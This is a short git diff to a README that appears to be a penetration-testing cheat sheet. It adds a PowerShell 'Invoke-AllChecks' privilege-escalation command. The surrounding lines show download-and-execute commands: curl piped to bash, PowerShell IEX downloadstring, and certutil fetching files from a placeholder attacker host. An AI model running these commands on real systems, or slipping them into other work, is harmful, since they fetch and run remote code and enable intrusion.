diff --git a/README.md b/README.md index 0558756..5aff477 100644 --- a/README.md +++ b/README.md @@ -754,6 +754,7 @@ curl {IP ADDRESS}/{FILE.sh} | bash # Windows - Download file and execute in powershell: powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")' +powershell -c 'Invoke-AllChecks' # Windows - Download file using certutil certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}